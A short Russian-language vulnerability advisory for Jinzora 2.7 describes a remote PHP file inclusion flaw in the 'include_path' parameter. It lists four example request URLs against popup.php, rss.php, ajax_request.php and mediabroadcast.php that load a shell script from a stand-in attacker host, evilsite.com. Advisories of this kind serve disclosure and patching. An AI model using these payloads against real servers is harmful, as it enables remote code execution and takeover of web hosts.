Программа: Jinzora 2.7

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "include_path" множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

http://[target]/[path]/popup.php?include_path=http://evilsite.com/shell.php?
http://[target]/[path]/rss.php?include_path=http://evilsite.com/shell.php?
http://[target]/[path]/ajax_request.php?include_path=http://evilsite.com/shell.php?
http://[target]/[path]/mediabroadcast.php?include_path=http://evilsite.com/shell.php?



Оставить мнение